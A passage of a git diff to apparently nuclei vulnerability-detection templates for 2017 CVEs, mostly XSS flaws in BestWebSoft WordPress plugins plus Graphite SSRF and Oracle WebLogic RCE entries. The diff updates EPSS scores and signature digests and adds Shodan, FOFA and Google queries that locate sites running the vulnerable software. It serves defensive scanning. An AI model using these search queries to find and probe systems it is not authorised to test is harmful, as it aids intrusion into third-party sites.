+# digest: 490a00463044022029e324ae86078771f7966a269328bfcbcbe6936a0ea4be26a3aa7d464e03985102206feb41aa4ca49f348a755fb8128515520fe3d45f4979f4fb8bf5ce642b8039a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml
index 590b427a09..e73fe4cd1a 100644
--- a/http/cves/2017/CVE-2017-18517.yaml
+++ b/http/cves/2017/CVE-2017-18517.yaml
@@ -18,7 +18,7 @@ info:
cve-id: CVE-2017-18517
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36836
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -27,6 +27,8 @@ info:
product: pinterest
framework: wordpress
publicwww-query: /wp-content/plugins/bws-pinterest/
+ shodan-query: http.html:/wp-content/plugins/bws-pinterest/
+ fofa-query: body=/wp-content/plugins/bws-pinterest/
tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated,bestwebsoft
http:
@@ -52,4 +54,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Pinterest by BestWebSoft")'
condition: and
-# digest: 4a0a00473045022100af2908669633025e0cd2c10a956572c409d05f08269b1acfc20d5f65a54c42a5022059f147b57251e197a65aa9d400012d989a43c66fa4416c1eb7ee9de23ffd4eb8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f42861bb6943a4d15b0b1d3395e4e7bd35611f410bbe8966b3fbcc368a0981b1022100e9ae78c33f21aa32aef0a555d60f034ddaa95205574bcbdd225cdfa87253bd89:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml
index a6aa60cd0c..460fc36583 100644
--- a/http/cves/2017/CVE-2017-18518.yaml
+++ b/http/cves/2017/CVE-2017-18518.yaml
@@ -18,7 +18,7 @@ info:
cve-id: CVE-2017-18518
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36245
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:bestwebsoft:smtp:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -27,6 +27,8 @@ info:
product: smtp
framework: wordpress
publicwww-query: /wp-content/plugins/bws-smtp/
+ shodan-query: http.html:/wp-content/plugins/bws-smtp/
+ fofa-query: body=/wp-content/plugins/bws-smtp/
tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated,bestwebsoft
http:
@@ -52,4 +54,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "SMTP by BestWebSoft")'
condition: and
-# digest: 4b0a00483046022100ca4f19febda81cd89ac62f3d319631ca3ba438d5c136b4119a5b590e76b81eb4022100c2f1c4f238b7b72d78dbdcfb3579a60e7abd1c1f1e92f5767756df9efdf59ac1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207ea1156bb7aca36c6c5f6c4b32a5da0dd2a371d79ef01efc1f617333ca8ea40102200af36b5bdce7f177e9470a66b8d7efc415ba18d72c902af7e624a870db782b89:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml
index b62e90fb9a..f21ed85a11 100644
--- a/http/cves/2017/CVE-2017-18527.yaml
+++ b/http/cves/2017/CVE-2017-18527.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2017-18527
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36836
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:bestwebsoft:pagination:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -26,6 +26,8 @@ info:
product: pagination
framework: wordpress
publicwww-query: "/wp-content/plugins/pagination/"
+ shodan-query: http.html:/wp-content/plugins/pagination/
+ fofa-query: body=/wp-content/plugins/pagination/
tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft,xss
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Pagination by BestWebSoft")'
condition: and
-# digest: 4a0a0047304502207cd86a94cd8aead4a49bbda3b690bb04c0f1febccfb6785b34b253cbab353f48022100e56e0a7397f05b7b5e043e8bf763fbcaf8ea0f17ab29aeecdf9fe91979b4c422:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c217cf6634e20882d3d3c5617089a1d6c93945b233f5793c195bb2d7efcdcb2b0221008e821f6cbd160c00a7f0cf3c32fbd0668e25537e0400c293d97280ef0bbd9585:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml
index 5e2a3b4028..fa245ea667 100644
--- a/http/cves/2017/CVE-2017-18528.yaml
+++ b/http/cves/2017/CVE-2017-18528.yaml
@@ -26,6 +26,8 @@ info:
product: pdf_\&_print
framework: wordpress
publicwww-query: "/wp-content/plugins/pdf-print/"
+ shodan-query: http.html:/wp-content/plugins/pdf-print/
+ fofa-query: body=/wp-content/plugins/pdf-print/
tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "PDF & Print by BestWebSoft")'
condition: and
-# digest: 4a0a00473045022100bbd7d8507fd10adffb260fac65763dd3af0450f57124c9588276e948193a1f4a02205120b25ba77cad36eec889f71816330835a4b76d3e08924a6bfea9d372b399f4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200f2fb28a6fe0f4e727facb4c87f8183d1c05d941bc0c2f181108a7196c99f7850220083b85ba8d55c0817511ea3f1ed08a03e9f474c8c0849d351db0352bb7d98241:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml
index 844e663cbb..bdf1d39088 100644
--- a/http/cves/2017/CVE-2017-18529.yaml
+++ b/http/cves/2017/CVE-2017-18529.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2017-18529
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36245
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -26,6 +26,8 @@ info:
product: promobar
framework: wordpress
publicwww-query: /wp-content/plugins/promobar/
+ shodan-query: http.html:/wp-content/plugins/promobar/
+ fofa-query: body=/wp-content/plugins/promobar/
tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "PromoBar by BestWebSoft")'
condition: and
-# digest: 4a0a00473045022100c33283fd423db70d402c7fd047dc7bebc3eec4bff361ff9d59d4b1efbf225c3d0220245cae47085cf15e815dc7d291310b1550e49f9eef084e23e11863a4392656f2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100dce2ddd796dc445298de0b036569d53a793dc981ca120153d192393eb4138b91022040b10fd80423f88a9e0bcfe1ba0dbb1621e43a2d2125149840e3524072ed75db:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml
index b51207a43c..2986dfffc1 100644
--- a/http/cves/2017/CVE-2017-18530.yaml
+++ b/http/cves/2017/CVE-2017-18530.yaml
@@ -26,6 +26,8 @@ info:
product: rating
framework: wordpress
publicwww-query: "/wp-content/plugins/rating-bws/"
+ shodan-query: http.html:/wp-content/plugins/rating-bws/
+ fofa-query: body=/wp-content/plugins/rating-bws/
tags: cve2017,cve,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Rating by BestWebSoft")'
condition: and
-# digest: 490a004630440220217ca670c25fd088273af9e902e6a30cf2ca9fa7555a0a0ad608454e147ef75c0220668e31fc705d4ceea309b1449b1311d65e0d07f98813067bb6205352b6e9985d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d14387bb807d60d92965e154331ac1f4dcf45276ab31045f5fa4aff1a4ad56f502205ec3a2018588e6e9fd95843db0d597aefa6494fcb532e57cf85856ad6081046f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml
index f926ec8b94..19cb52f5d5 100644
--- a/http/cves/2017/CVE-2017-18532.yaml
+++ b/http/cves/2017/CVE-2017-18532.yaml
@@ -26,6 +26,8 @@ info:
product: realty
framework: wordpress
publicwww-query: /wp-content/plugins/realty/
+ shodan-query: http.html:/wp-content/plugins/realty/
+ fofa-query: body=/wp-content/plugins/realty/
tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Realty by BestWebSoft")'
condition: and
-# digest: 4a0a004730450220370407ad931bf1c297e16c99d3c5c1ca953628677fc94ea86715e3131e2b0233022100f740ab11752605c7ddc1fe1f1c1724858aad10d2b52e78f1f9f4a416290da561:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022055f7184ddba40ff8bc048f5fde8113756fd30099586ffa5b9de186dd6a8498e20221008eff9c034c2b21f9f1086faaa85dfa1e220a4f802f772f45005325021daa14a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml
index cd26894b3d..a44a70c343 100644
--- a/http/cves/2017/CVE-2017-18536.yaml
+++ b/http/cves/2017/CVE-2017-18536.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2017-18536
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36857
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -49,4 +49,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ef531d92525eaf4b6152954eebea1e6c23d7c515afce012b6c1223079ec3ad9002210086b9a6f9ffefa3c35ec6bbe9ee00c650696dced3b57ab09fe2c93ebc05d0a5cf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210095f1b8849e5c8ac04f646439eb2eb865483f6432fa2bb914e0942004393ffccc022100907a8ec81a4e92bfcf8c949f7d9e3853dc3033e1321a8ed4015f8aef930822e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml
index a967010a40..5c68ef701c 100644
--- a/http/cves/2017/CVE-2017-18537.yaml
+++ b/http/cves/2017/CVE-2017-18537.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2017-18537
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36245
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:bestwebsoft:visitors_online:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -26,6 +26,8 @@ info:
product: visitors_online
framework: wordpress
publicwww-query: "/wp-content/plugins/visitors-online/"
+ shodan-query: http.html:/wp-content/plugins/visitors-online/
+ fofa-query: body=/wp-content/plugins/visitors-online/
tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Visitors Online by")'
condition: and
-# digest: 4b0a00483046022100f6694c2351da20106780916ead57acded8b3561215bff593cfc360a10dedda34022100c75806459a4114b92d8648e825188a9cbc42ba259aa226de782c73040b0007dd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b1b8b53832c640443927a239b59a693a670b9bfc237cb699ba61b223cb8a652c022041096691678b98e9fcdf56d6d8535bb66cb180a08e91b26c5b46c3f4ce771c1d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml
index 4dc23667c9..0182d593bc 100644
--- a/http/cves/2017/CVE-2017-18542.yaml
+++ b/http/cves/2017/CVE-2017-18542.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2017-18542
cwe-id: CWE-79
epss-score: 0.00221
- epss-percentile: 0.59511
+ epss-percentile: 0.60119
cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -26,6 +26,8 @@ info:
product: zendesk_help_center
framework: wordpress
publicwww-query: "/wp-content/plugins/zendesk-help-center/"
+ shodan-query: http.html:/wp-content/plugins/zendesk-help-center/
+ fofa-query: body=/wp-content/plugins/zendesk-help-center/
tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Zendesk Help Center by BestWebSoft")'
condition: and
-# digest: 4a0a0047304502200f7aefa84c2f74418d8bfda7eaebb599348ddbbfb4c230fcfc56a9b82ccc1b3d022100eeaecc0e672ed38b43954db6259d083cd20eb2535283ec8ac0e9154f6d71d649:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a642d73b44074f3bbdf0efaccd2848c1c08663433c85afb0b7c479451a28fc9402210099b949219f2bc734a1a37836c79d73c465a52c7d36281dc1509ff0731b6fe843:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml
index 0069a24e8b..417feb4dca 100644
--- a/http/cves/2017/CVE-2017-18556.yaml
+++ b/http/cves/2017/CVE-2017-18556.yaml
@@ -18,7 +18,7 @@ info:
cve-id: CVE-2017-18556
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36245
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -27,6 +27,8 @@ info:
product: google_analytics
framework: wordpress
publicwww-query: "/wp-content/plugins/bws-google-analytics/"
+ shodan-query: http.html:/wp-content/plugins/bws-google-analytics/
+ fofa-query: body=/wp-content/plugins/bws-google-analytics/
tags: cve2017,cve,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft
http:
@@ -52,4 +54,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Google Analytics by BestWebSoft")'
condition: and
-# digest: 4a0a00473045022058df345caa79fcc85007be091f7b75d399b7d9f2502995f539f1e3387b69d9e7022100d5f4cc931077b75d81472cc62173979120b245394f458e0e02215ea798ce26bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fe01c932c0e4cb28aaa09be35931901def6da9156423788f1273ce95ec25383e022100881310859f0fe8598816e9dd175b53807394c4e2606f0e34eaa6a4520c858649:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml
index 90fa86fe6c..1e38c2e008 100644
--- a/http/cves/2017/CVE-2017-18557.yaml
+++ b/http/cves/2017/CVE-2017-18557.yaml
@@ -18,7 +18,7 @@ info:
cve-id: CVE-2017-18557
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36857
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:bestwebsoft:google_maps:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -27,6 +27,8 @@ info:
product: google_maps
framework: wordpress
publicwww-query: "/wp-content/plugins/bws-google-maps/"
+ shodan-query: http.html:/wp-content/plugins/bws-google-maps/
+ fofa-query: body=/wp-content/plugins/bws-google-maps/
tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated,bestwebsoft
http:
@@ -52,4 +54,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Google Maps by BestWebSoft")'
condition: and
-# digest: 490a0046304402202f2ce883ac28fa110099e93debcea93ba72a87c644e7d50eab47ba65b5b0c0010220263c16a96c6d3ee59ee4639403d581676533664e25e9d12ddafed64e9f58a560:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ed1b6c5d04f21c78e943b4993d472189e36df1733dc10800b62deca1bc6c18d2022014f77ec4de6a90b2c095c1dbdc5bb61e93e03eb6f5f3ecd1ec60f9703ee2e024:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml
index ac1987e5ac..fbd0973fd6 100644
--- a/http/cves/2017/CVE-2017-18558.yaml
+++ b/http/cves/2017/CVE-2017-18558.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2017-18558
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36245
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -26,6 +26,8 @@ info:
product: testimonials
framework: wordpress
publicwww-query: "/wp-content/plugins/bws-testimonials/"
+ shodan-query: http.html:/wp-content/plugins/bws-testimonials/
+ fofa-query: body=/wp-content/plugins/bws-testimonials/
tags: cve2017,cve,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Testimonials by BestWebSoft")'
condition: and
-# digest: 4a0a004730450221008db3605db8249b8d03ef76b687a919f1586b95a60fd71fb15afb8cc74ba152130220371bf249484018debba5b816e27dcf3f7d8fdd724c87788635a6136b1266ef07:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b857ebe6869ee45f7dc4cff92ae7682a95b98286296b23281f2dfbdf01999732022100f8f5b927297f1d44346317dcd9659352a25a45199675628023f765a3d6a6cc22:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml
index cf3f3bc36f..8b35ceb57f 100644
--- a/http/cves/2017/CVE-2017-18562.yaml
+++ b/http/cves/2017/CVE-2017-18562.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2017-18562
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36857
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:bestwebsoft:error_log_viewer:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -26,6 +26,8 @@ info:
product: error_log_viewer
framework: wordpress
publicwww-query: "/wp-content/plugins/error-log-viewer/"
+ shodan-query: http.html:/wp-content/plugins/error-log-viewer/
+ fofa-query: body=/wp-content/plugins/error-log-viewer/
tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Error Log Viewer by BestWebSoft")'
condition: and
-# digest: 490a0046304402204ffa643dfec6a2a1304afeb8c507e527816e6ffdbf5bf55d1f78ce117196956c022062d2904783e48e1571ddcd034438544bd6ef716a64604b5cd204c9e6d93f17fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cd3c538f6d53984acdce0e66fef97e1081a643dbb6921d756ebc88c5d4d2a65c022100ca84221f6ec3d788ebc71c032d4ece39ecca89429e9630d41c52dd3f169021c1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml
index 4aa9bf9453..519180be8c 100644
--- a/http/cves/2017/CVE-2017-18564.yaml
+++ b/http/cves/2017/CVE-2017-18564.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2017-18564
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36245
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -26,6 +26,8 @@ info:
product: sender
framework: wordpress
publicwww-query: "/wp-content/plugins/sender/"
+ shodan-query: http.html:/wp-content/plugins/sender/
+ fofa-query: body=/wp-content/plugins/sender/
tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Sender by BestWebSoft")'
condition: and
-# digest: 490a0046304402206bf5a1ea4bf5034892e440458b150b6df66ff63e42a5677e30878b7d4b43d34102205868e55cb82cdee0363c36f0da53f76767397ddc734f06b2df94b8835493bbe5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203c10e42cf8c927b6c89715593cbc44a0eb7d70415e077c7cefc813541abfac28022100f611a234592239a4f01327dce894478ed0b4fba7ad216909b3e8166758c90381:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml
index 8c99ba4b6a..d7dbdba507 100644
--- a/http/cves/2017/CVE-2017-18565.yaml
+++ b/http/cves/2017/CVE-2017-18565.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2017-18565
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36245
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -26,6 +26,8 @@ info:
product: updater
framework: wordpress
publicwww-query: "/wp-content/plugins/updater/"
+ shodan-query: http.html:/wp-content/plugins/updater/
+ fofa-query: body=/wp-content/plugins/updater/
tags: cve2017,cve,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Updater by BestWebSoft")'
condition: and
-# digest: 4a0a00473045022100a044599dd64fbe525d5491598bb2bd08fb20f3b1246daa85cf894198d9a4b72a02202c881e075c5cf297c2153729f9a3bca4925a615334a49850ca79a635c41b5efb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f088907da44a2cfd70389dfaf174e89311d92a1172ac70a3c54dc21e056b198602205c275024f4e29ef71f7a5391b3e006873b4244b1eed2b06005d39186225cb401:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml
index fdd8dd2053..806074a32d 100644
--- a/http/cves/2017/CVE-2017-18566.yaml
+++ b/http/cves/2017/CVE-2017-18566.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2017-18566
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36836
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:bestwebsoft:user_role:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -26,6 +26,8 @@ info:
product: user_role
framework: wordpress
publicwww-query: "/wp-content/plugins/user-role/"
+ shodan-query: http.html:/wp-content/plugins/user-role/
+ fofa-query: body=/wp-content/plugins/user-role/
tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "User Role by BestWebSoft")'
condition: and
-# digest: 490a0046304402200d379d9480f868260b65e821ad630ab781d2dd52c2f0e25e667b41cf3bf9c7cb022068938f861976e3222cbe26a54ec296eef974f942967912acb942edb9a52d2f7f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100adad73e4ddbb122f6a74cd2eabb9fdba00f971d35e4fe0f330cd9489c8a85c220220035d45b55c8be488ed39701890033e2b69d9920dfcb71614149d760df5788bc4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml
index b7393b1790..60c4d50b3c 100644
--- a/http/cves/2017/CVE-2017-18598.yaml
+++ b/http/cves/2017/CVE-2017-18598.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2017-18598
cwe-id: CWE-79
epss-score: 0.00094
- epss-percentile: 0.38554
+ epss-percentile: 0.39752
cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -29,7 +29,6 @@ info:
product: qards
framework: wordpress
tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo
-
flow: http(1) && http(2)
http:
@@ -59,4 +58,4 @@ http:
part: body
words:
- "console.log"
-# digest: 4b0a00483046022100a1ebb8975874781de2f146909353d3cb9d51b05b60508558c7d599376c062441022100c9a14b006fb26874b9b2f075e436d6c4ca526fe128d549c7c9a7fd5ed7c35cef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022051e9027e449edff73649c81fe3cdba7ea4987a418a629a8b42e46524a18db753022100fcab7edcab8e705beea02220885aaa95c1084399834295982ccc23d902f9795e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml
index f79e1ee9db..6f0e8b5a88 100644
--- a/http/cves/2017/CVE-2017-18638.yaml
+++ b/http/cves/2017/CVE-2017-18638.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 7.5
cve-id: CVE-2017-18638
cwe-id: CWE-918
- epss-score: 0.00902
- epss-percentile: 0.80938
+ epss-score: 0.00827
+ epss-percentile: 0.81931
cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -40,4 +40,4 @@ http:
part: interactsh_protocol
words:
- "http"
-# digest: 4b0a00483046022100a2ead70694f8fbe9b3e3642b2ba252925a11e895d24c116c6fcf822fec79ffc3022100cb724ed9183a630d2b16eb3ad1ea4e8dd9589e0005873b67061634479dbe51eb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d29fdd415b29112463f116a395e27d57520ac8863b59435c3ab3bd8c9de579b2022100b98beb232332f6eb2c320dcb65057b007073e7c8ea50fd433ac91e2a9e86355a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml
index 4b4be69409..9c37ceeee1 100644
--- a/http/cves/2017/CVE-2017-3506.yaml
+++ b/http/cves/2017/CVE-2017-3506.yaml
@@ -26,6 +26,9 @@ info:
max-request: 1
vendor: oracle
product: weblogic_server
+ shodan-query: http.title:"oracle peoplesoft sign-in"
+ fofa-query: title="oracle peoplesoft sign-in"
+ google-query: intitle:"oracle peoplesoft sign-in"
tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle
http:
@@ -58,4 +61,4 @@ http:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
-# digest: 4a0a004730450221009af3dc7a023956f425c329f162e8bf603416c546b1876ce01e72ac09119bc24202205406c351433b267b3312803f8f1cd75b9707dfc851008977f33e4db88e70404d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100878940581311a5d9587aba613294a182d8de4a03d087fde8f3eb14269d7b253d02206ea04fe2355b669325164543d5b02337f05eccde9b61657d31142cd642735208:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml
index 34e1582b67..7725db6fc3 100644
--- a/http/cves/2017/CVE-2017-3528.yaml
+++ b/http/cves/2017/CVE-2017-3528.yaml
@@ -19,7 +19,7 @@ info:
cve-id: CVE-2017-3528
cwe-id: CWE-601
epss-score: 0.00865
- epss-percentile: 0.81972
+ epss-percentile: 0.82307
cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -37,4 +37,4 @@ http:
part: body
words:
- 'noresize src="/\interact.sh?configName='
-# digest: 4b0a00483046022100af3043267f661047f2abd255139659c6876cf783ed9a49639876eac74d86842f022100e4a34a3823612505eff0f06d3c4e61785f3cd30694b6d799da940a7b4bd501e2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c2e8be373cdfe4833f47e0738ec1a9f260610f9aaac5a8bcd4511f8ebd39ef7a022074324b0070bd1af8ec301343eee9810571eabec58ee24f22be7a44c8eb05436e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml
index a39445b71a..e08ffdb597 100644
--- a/http/cves/2017/CVE-2017-4011.yaml
+++ b/http/cves/2017/CVE-2017-4011.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2017-4011
cwe-id: CWE-79
